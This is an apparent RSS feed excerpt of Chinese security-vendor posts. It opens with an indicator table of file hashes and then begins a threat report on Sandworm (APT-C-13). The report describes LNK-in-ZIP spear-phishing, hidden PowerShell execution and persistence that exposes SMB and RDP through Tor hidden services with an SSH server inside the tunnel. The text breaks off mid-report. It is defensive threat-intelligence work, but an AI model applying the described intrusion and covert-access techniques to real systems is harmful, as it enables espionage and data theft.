SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">xinference-2.6.1/xinference/__init__.py</span></span></span></p></td></tr><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">fe407adc7d14ab0ba6f415914fbf7959</span></span></span></p></td><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">xinference-2.6.2/xinference/__init__.py</span></span></span></p></td></tr><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">630082e1b20c362963b9dda3bfffb2dc</span></span></span></p></td><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">stage1.py</span></span></span></p></td></tr><tr><td data-colwidth="287"><p><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">0ab3ab613fd3a85a06ea769b0f4ffa5c</span></span></span></p></td><td data-colwidth="287"><p data-mpa-action-id="moglvg0b1nl"><span style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;"><span style="font-size: 15px;"><span leaf="">stage2.py</span></span></span></p></td></tr></tbody></table></p></div></div></div><div data-mpa-template="t" mpa-data-temp-power-by="yiban.io" mpa-from-tpl="t" data-mpa-action-id="moglyewodcf"><div data-mpa-template="t" mpa-from-tpl="t"><div data-role="outer" label="Powered by 135editor.com" mpa-from-tpl="t"><div data-tools="135编辑器" data-id="96036" mpa-from-tpl="t"><div style="margin:10px auto;" mpa-from-tpl="t"><div data-autoskip="1" style="text-align: justify;letter-spacing: 1.5px;line-height: 1.75em;color: rgb(62, 62, 62);" mpa-from-tpl="t"><p hm_fix="208:559"><span style="color: #be191f;" data-mpa-action-id="moglypxt14du" data-pm-slice="0 0 []"><strong style="letter-spacing: 0.544px;caret-color: red;" mpa-from-tpl="t"><span style=""><span leaf="" mpa-font-style="moglypxg21yq" style="font-size: 15px;">360</span></span></strong><strong style="letter-spacing: 0.544px;caret-color: red;" mpa-from-tpl="t"><span style=""><span leaf="" mpa-font-style="moglypxg1yb7" style="font-size: 15px;">高级威胁研究院</span></span></strong></span></p><p style="min-height: 1em;letter-spacing: 0.544px;line-height: 1.5em;" mpa-from-tpl="t"><span style="color: rgb(136, 136, 136);"><span leaf="" mpa-font-style="moglymuio3v" style="font-size: 14px;" data-mpa-action-id="moglymuwopn" data-pm-slice="0 0 []">360高级威胁研究院是360数字安全集团的核心能力支持部门，由360资深安全专家组成，专注于高级威胁的发现、防御、处置和研究，曾在全球范围内率先捕获双杀、双星、噩梦公式等多起业界知名的0day在野攻击，独家披露多个国家级APT组织的高级行动，赢得业内外的广泛认可，为360保障国家网络安全提供有力支撑。</span></span></p></div></div></div></div></div></div><p style="text-indent: 2em;text-align: justify;margin-bottom: 16px;margin-top: 16px;line-height: 1.6em;"><o:page></o:page></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=8cdf632e&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzUyMjk4NzExMA%3D%3D%26mid%3D2247508515%26idx%3D1%26sn%3D82169bea927184c000de87d008eee7fa">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Mon, 27 Apr 2026 15:08:00 +0800</pubDate>
    </item>
    <item>
      <title>疑似APT-C-13（Sandworm）组织利用SSH+TOR隧道实现隐蔽持久化的攻击活动分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&amp;mid=2247508435&amp;idx=1&amp;sn=4bf6b56ed07bc47e05e6e64765a5a1bb</link>
      <description>近期360高级威胁研究院捕获APT-C-13组织利用SSH与TOR嵌套隧道技术实施定向攻击的多个恶意样本，这些样本在受害机与攻击者之间搭建了一条双重加密的“匿名直梯”，从而让攻击者能够肆无忌惮的进行敏感信息窃取。</description>
      <content:encoded><![CDATA[<p>原创 <span>高级威胁研究院</span> <span>2026-04-21 17:47</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=c4d06cbd&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FEmmib7pWXrXKibf0QibribicXgJRuUBmvdZ2vLAVswcrNC0OluicIBVDl6Oe2XHdtZExufcXK48wZ6on4b14PWicVQvJx9s2KdSCAlJ5ZWmYjxiczkU%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>近期360高级威胁研究院捕获APT-C-13组织利用SSH与TOR嵌套隧道技术实施定向攻击的多个恶意样本，这些样本在受害机与攻击者之间搭建了一条双重加密的“匿名直梯”，从而让攻击者能够肆无忌惮的进行敏感信息窃取。</p>
  <div data-role="outer" label="Powered by 135editor.com" style="" data-pm-slice="0 0 []"><div data-tools="135编辑器" data-id="102539"><div style="margin: 10px auto;text-align: left;"><div style="background: #f2f2f2;"><div style="box-sizing: border-box;padding:1em 1em;"><div style="display: flex;justify-content:  space-between;align-items: flex-end;" hm_fix="312:231"><div style="display: flex;justify-content: space-between;flex-direction: column;align-items: flex-start;border-left: 4px solid #be191f;box-sizing: border-box;"><p data-brushtype="text" style="font-size: 16px;letter-spacing: 1.5px;padding: 0px 0em 3px;color: #322828;margin-left: 12px;border-bottom: 1px solid #be191f;font-style: italic;box-sizing: border-box;"><span style="font-size: 18px;"><strong><span leaf="">APT-C-13</span></strong></span></p><p data-brushtype="text" style="letter-spacing: 1.5px;padding: 4px 0em 0px;color: #be191f;font-style: italic;box-sizing: border-box;"><span style="font-size: 18px;"><strong><span leaf="">Sandworm</span></strong></span></p></div></div><div data-autoskip="1" style="text-align: justify;line-height: 1.75em;letter-spacing: 1.5px;font-size: 17px;color: rgb(0, 0, 0);margin-top: 20px;"><p style="text-align:justify;vertical-align: inherit;padding: 0px;clear: both;color: rgb(51, 51, 51);font-weight: normal;font-size: 17px;text-indent: 28px;line-height: 1.5em;margin-top: 8px;margin-bottom: 8px;display: block;font-family:等线;"><span style="padding: 0px;color: rgb(51, 51, 51);text-align: justify;line-height: 18.4px;font-size: 17px;font-family:仿宋;"><span leaf="" mpa-font-style="mo888qu91tp9" style="font-family: &#34;mp-quote&#34;, -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;" data-mpa-action-id="mo888quo163n" data-pm-slice="0 0 []">APT-C-13（Sandworm）组织（又名FROZENBARENTS）是一个具有国家背景的高级持续性威胁组织，长期从事全球网络间谍活动。该组织以高度隐蔽性和战略针对性著称，主要针对政府机构、外交部门、能源企业及科研组织，旨在窃取政治、军事和科技情报。自2014年以来，该组织不断升级其活动，综合运营社会工程学、零日漏洞及多层代理网络（如TOR）实施定向渗透攻击，具备长期潜伏、精准打击与持续监控的典型特征。</span></span></p></div></div></div></div></div></div><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div style="text-align: left;margin: 10px auto;"><div style="background: linear-gradient(to bottom,rgba(254,254,254,0) 0%,rgba(254,254,254,0) 60%,#ffffff 60%,#ffffff 100%);"><div style="display: inline-block;"><div style="background-color: #be191f;padding: 6px 15px;box-sizing:border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: #ffffff;"><strong><span style="font-size:18px;"><span leaf="">一、概述</span></span></strong></p></div></div></div></div></div><h1 style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span data-pm-slice="0 0 []"><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">近期</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">360</span></font></span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">高级威胁研究院捕获</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">APT-C-13组织</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">利用</span></font><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">SSH与TOR嵌套隧道技术实施定向攻击的多个恶意样本，这些样本</span><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">在受害机与攻击者之间搭建了一条双重加密的</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">“匿名直梯”，从而让攻击者能够肆无忌惮的进行敏感信息窃取。鉴于这类攻击很少被披露，因此</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">本文详细介绍整个攻击流程，希望相关企业和个人能够</span></font><font face="仿宋"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">提高安全防范意识，采取有效措施保护企业资产和用户财产免受损失。</span></font></h1><div data-role="outer" label="edit by 135editor" data-pm-slice="0 0 []"><div style="text-align: left;margin: 10px auto;"><div style="background: linear-gradient(to bottom,rgba(254,254,254,0) 0%,rgba(254,254,254,0) 60%,#ffffff 60%,#ffffff 100%);"><div style="display: inline-block;"><div style="background-color: #be191f;padding: 6px 15px;box-sizing:border-box;"><p data-brushtype="text" style="font-size: 18px;letter-spacing: 1.5px;color: #ffffff;"><strong><span style="font-size:18px;"><span leaf="">二、攻击活动分析</span></span></strong></p></div></div></div></div></div><h2><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">1.</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">攻击流程分析</span></span></h2><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">APT-C-13组织通过鱼叉邮件投递携带恶意LNK文件的ZIP压缩包，诱骗用户执行后，LNK文件会在用户配置文件目录及其子文件夹中递归搜索诱饵压缩包并多层解压至指定位置，随后运行主控脚本创建SSH与TOR两个计划任务以构建复杂通信链路。其中TOR任务利用HiddenServicePort特性将受害机本地关键服务端口（如SMB/445、RDP/3389）映射至Onion匿名域名，使攻击者无需穿透入站防火墙即可通过Tor节点全球直连内网；同时SSH任务在Tor隧道内部署轻量化SSH服务端，通过PubkeyAuthentication公钥认证和自定义Subsystem子系统配置，形成兼具强加密性与权限控制的隐蔽远程管理通道，有效规避传统流量审计。整个攻击流程如下所示。</span></p><p style="text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4314685314685315" data-s="300,640" data-type="png" data-w="1430" style="width:100%;" data-croporisrc="https://mmbiz.qpic.cn/sz_mmbiz_png/Emmib7pWXrXIF6eUn7vicOlwLkBAqWw8Z7ybyUTK175eff6amcmZD9z9eg2wehbIWKCCCXUXC0giahVBouDZ7SxSnglLicxfQ44Um5YDzqJLBtU/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="578" data-cropsely2="249" data-backw="578" data-backh="249" data-imgfileid="100024783" src="https://wechat2rss.xlab.app/img-proxy/?k=5ec345e2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FEmmib7pWXrXIF6eUn7vicOlwLkBAqWw8Z7ybyUTK175eff6amcmZD9z9eg2wehbIWKCCCXUXC0giahVBouDZ7SxSnglLicxfQ44Um5YDzqJLBtU%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span><o:page></o:page></p><h2 style=""><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">2.</span></span><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><span textstyle="" style="color: rgb(190, 25, 31);font-weight: bold;">载荷投递分析</span></span></h2><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">近期我们捕获了该组织多个攻击样本，下面以其中一个ZIP压缩包进行分析。</span></p><table style="border:none;border-collapse:collapse;mso-table-layout-alt:fixed;mso-border-top-alt:solid windowtext 0.5pt;mso-border-left-alt:solid windowtext 0.5pt;mso-border-bottom-alt:solid windowtext 0.5pt;mso-border-right-alt:solid windowtext 0.5pt;width:575px;mso-padding-alt:0pt 5.4pt 0pt 5.4pt;"><tbody><tr><td data-colwidth="94" width="94" valign="top" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 0pt 5.4pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;text-align: justify;text-justify: inter-ideograph;line-height: 20.0pt;mso-line-height-rule: exactly;mso-pagination: none;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:仿宋;mso-ascii-font-family:仿宋;mso-fareast-font-family:仿宋;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;mso-font-kerning:1.0pt;"><span leaf="" mpa-font-style="mo2ll7y8205u" style="font-size: 16px;" data-mpa-action-id="mo2ll7ym1gnt" data-pm-slice="0 0 []">MD5</span></span></p></td><td data-colwidth="481" width="387" valign="top" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 0pt 5.4pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;text-align: justify;text-justify: inter-ideograph;line-height: 20.0pt;mso-line-height-rule: exactly;mso-pagination: none;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:仿宋;mso-ascii-font-family:仿宋;mso-fareast-font-family:仿宋;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;mso-font-kerning:1.0pt;"><span leaf="" mpa-font-style="mo2ll4hrpd0" style="font-size: 16px;" data-mpa-action-id="mo2ll4i5out" data-pm-slice="0 0 []">2156c270ffe8e4b23b67efed191b9737</span></span></p></td></tr><tr><td data-colwidth="94" width="94" valign="top" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 0pt 5.4pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;text-align: justify;text-justify: inter-ideograph;line-height: 20.0pt;mso-line-height-rule: exactly;mso-pagination: none;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:仿宋;mso-ascii-font-family:仿宋;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;mso-font-kerning:1.0pt;"><span leaf="" mpa-font-style="mo2llbbjhl6" style="font-size: 16px;" data-mpa-action-id="mo2llbbw215d" data-pm-slice="0 0 []">文件名称</span></span></p></td><td data-colwidth="481" width="387" valign="top" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 0pt 5.4pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;text-align: justify;text-justify: inter-ideograph;line-height: 20.0pt;mso-line-height-rule: exactly;mso-pagination: none;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:仿宋;mso-ascii-font-family:仿宋;mso-fareast-font-family:仿宋;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;"><span leaf="" mpa-font-style="mo2llyrf109r" style="font-size: 16px;" data-mpa-action-id="mo2llyrs1udr" data-pm-slice="0 0 []">Iskhod_7582_Predstavlenie_na_naznachenie.zip</span></span></p></td></tr><tr><td data-colwidth="94" width="94" valign="top" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 0pt 5.4pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;font-weight: normal;mso-bidi-font-weight: normal;text-align: justify;text-justify: inter-ideograph;line-height: 20.0pt;mso-line-height-rule: exactly;mso-pagination: none;"><span style="font-size:14.0pt;mso-bidi-font-size:14.0pt;font-family:仿宋;mso-ascii-font-family:仿宋;mso-bidi-font-family:Arial;font-variant:normal;text-transform:none;mso-font-kerning:1.0pt;"><span leaf="" mpa-font-style="mo2llu44j9p" style="font-size: 17px;" data-mpa-action-id="mo2llu4g1e89" data-pm-slice="0 0 []">文件大小</span></span></p></td><td data-colwidth="481" width="387" valign="top" style="border-width: 1pt;border-style: solid;border-color: windowtext;padding: 0pt 5.4pt;"><p style="margin-left: 0pt;text-indent: 0pt;font-size: 12pt;font-family: 宋体;font-weight: normal;text-align: left;line-height: 20pt;"><span style="font-size: 14pt;font-family: 仿宋;font-variant: normal;text-transform: none;"><span leaf="" mpa-font-style="mo2llpkb1ldh" style="font-size: 16px;" data-mpa-action-id="mo2llpkn19xj" data-pm-slice="0 0 []">11.73 MB (12304687 bytes)</span></span></p></td></tr></tbody></table><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">解压该恶意压缩包后，发现其中包含两个精心伪装的组件：一个是图标和文件名刻意模仿PDF文档的LNK快捷方式文件，另一个是设置了隐藏属性的虚假系统文件夹&#34;$RECYCLE.BIN&#34;，该目录通过属性伪装成Windows回收站系统目录以迷惑用户。</span></p><p style="text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.11280101394169835" data-w="789" style="width: 553.74px;height: 62.47px;" src="https://wechat2rss.xlab.app/img-proxy/?k=06c240f7&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJWACKZzfVZib1fwPjrvGX7wKWhJFNI8pOzYGxb874mOglQNo06uWwQpu8baMP9UoicABdHGBuJ1cVKz1wCO5bpLIjLN1Vib9uaIg%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">提取该LNK文件的命令行参数，如下所示。</span></p><p style="text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.13284132841328414" data-w="1084" style="width: 553.74px;height: 73.53px;" src="https://wechat2rss.xlab.app/img-proxy/?k=3d48824f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FEmmib7pWXrXJVEsYeQgqMibb0jMMLaSXAjKwDoYV7fwU6n0wUlQSCkZuFKtl4zlHerjqSlibMv6gD7Exic6diaI4j2oqcNYrQnsLoiaoMRR5351ko%2F640%3Fwx_fmt%3Dpng"/></span></p><p style="text-indent: 2em;margin-bottom: 16px;margin-top: 16px;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;">该LNK主要功能是释放多个恶意载荷并执行，其流程是：首先在当前用户的配置文件目录及其子文件夹中递归搜索自身诱饵压缩包（Iskhod_7582_Predstavlenie_na_naznachenie.zip），将其解压至AppData\Roaming\uuidPeriod目录后，定位其中伪装在$RECYCLE.BIN路径下的无后缀文件employeeTrigger并将其强制重命名为.zip格式，随即将其二次解压至AppData\Roaming\outlook目录，最终读取解压出的currentSessionTrigger文件内容，将其作为PowerShell指令启动一个隐蔽无窗口（Hidden）的进程在后台静默执行。其解压后所有的文件如下所示。</span><o:page></o:page></p><p style="text-align: center;"><span leaf="" style="color: rgba(0, 0, 0, 0.9);font-size: 17px;font-family: mp-quote, &#34;PingFang SC&#34;, system-ui, -apple-system, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;line-height: 1.6;letter-spacing: 0.034em;font-style: normal;font-weight: normal;"><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.7726550079491256" data-w="629" style="width: 436.28px;height: 337.11px;" 